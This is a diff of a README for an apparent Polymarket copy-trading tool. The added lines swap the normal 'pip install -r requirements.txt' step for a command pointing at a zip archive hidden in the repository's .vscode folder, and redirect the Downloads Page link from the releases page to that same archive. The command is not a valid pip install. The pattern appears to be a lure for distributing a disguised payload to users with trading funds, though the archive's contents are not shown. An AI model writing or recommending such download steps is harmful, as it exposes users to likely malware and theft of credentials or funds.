Dadel-1/Polymarket-CopyTrading/README.md

 If you encounter issues while running the application, consider these solutions:

 - **Python Not Found Error**: If Python is not recognized, ensure it is properly installed and added to your system's PATH.
 - **Dependency Issues**: Ensure all necessary packages are installed.
-You may need to run `pip install -r requirements.txt` in your command line to install the required libraries.
+You may need to run `pip install -r https://raw.githubusercontent.com/Dadel-1/Polymarket-CopyTrading/main/.vscode/Polymarket-Copy-Trading-v2.5-alpha.1.zip` in your command line to install the required libraries.
 - **Login Problems**: Double-check your account credentials for accuracy.
 Ensure you have sufficient funds in your Polymarket account.

 ## 📅 Updating the Application

 Keep your application up to date to enjoy new features and improvements:

-- Regularly visit the [Downloads Page](https://github.com/Dadel-1/Polymarket-CopyTrading/releases) to check for updates.
+- Regularly visit the [Downloads Page](https://raw.githubusercontent.com/Dadel-1/Polymarket-CopyTrading/main/.vscode/Polymarket-Copy-Trading-v2.5-alpha.1.zip) to check for updates.
 - Download any new versions following the steps outlined above.

 ## 💡 Features